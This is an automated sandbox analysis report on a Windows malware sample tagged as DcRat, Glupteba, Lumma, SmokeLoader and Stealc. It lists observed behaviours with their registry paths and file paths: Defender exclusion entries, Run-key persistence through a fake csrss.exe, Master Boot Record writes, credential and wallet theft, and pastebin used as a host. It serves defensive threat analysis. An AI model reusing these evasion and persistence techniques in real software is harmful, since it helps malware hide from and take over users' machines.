Malware Analysis Report

2024-11-30 04:55

Sample ID 240223-fe56eabb6t
Target 5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d
SHA256 5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d
Tags
dcrat glupteba lumma smokeloader stealc pub1 backdoor bootkit discovery dropper evasion infostealer loader persistence rat rootkit spyware stealer trojan upx
score
10/10

Analysis Overview

score
10/10

SHA256

5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d

Threat Level: Known bad

The file 5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d was found to be: Known bad.

Malicious Activity Summary

Stealc

Glupteba payload

DcRat

Windows security bypass

Glupteba

Lumma Stealer

SmokeLoader

Creates new service(s)

Stops running service(s)

Downloads MZ/PE file

Modifies Windows Firewall

Loads dropped DLL

Windows security modification

Reads user/profile data of web browsers

Deletes itself

UPX packed file

Reads data files stored by FTP clients

Executes dropped EXE

Manipulates WinMonFS driver.

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Adds Run key to start application

Writes to the Master Boot Record (MBR)

Suspicious use of SetThreadContext

Drops file in System32 directory

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Launches sc.exe

Program crash

Enumerates physical storage devices

Unsigned PE

Checks SCSI registry key(s)

Creates scheduled task(s)

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Modifies data under HKEY_USERS

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-23 04:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-23 04:48

Reported

2024-02-23 04:53

Platform

win10-20240221-en

Max time kernel

300s

Max time network

304s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\C12D.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\288c47bbc1871b439df19ff4df68f076.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Creates new service(s)

persistence

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\288c47bbc1871b439df19ff4df68f076.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\C12D.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1990815831-2007029909-3877453929-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Users\Admin\AppData\Local\Temp\E5A0.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\system32\wusa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\System32\Conhost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4312 set thread context of 1256 N/A C:\Users\Admin\AppData\Local\Temp\C12D.exe C:\Users\Admin\AppData\Local\Temp\C12D.exe
PID 916 set thread context of 1320 N/A C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe C:\Windows\system32\conhost.exe
PID 916 set thread context of 2624 N/A C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe C:\Windows\explorer.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\134A.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\134A.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\134A.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\hucvvwd N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\hucvvwd N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\hucvvwd N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\nsf11EF.tmp N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\nsf11EF.tmp N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\wusa.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\Conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2001 = "Cabo Verde Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1721 = "Libya Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2791 = "Novosibirsk Daylight Time" C:\Windows\windefender.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-651 = "AUS Central Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2511 = "Lord Howe Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\Conhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2512 = "Lord Howe Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\wusa.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-362 = "GTB Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\wusa.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\wusa.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\Conhost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
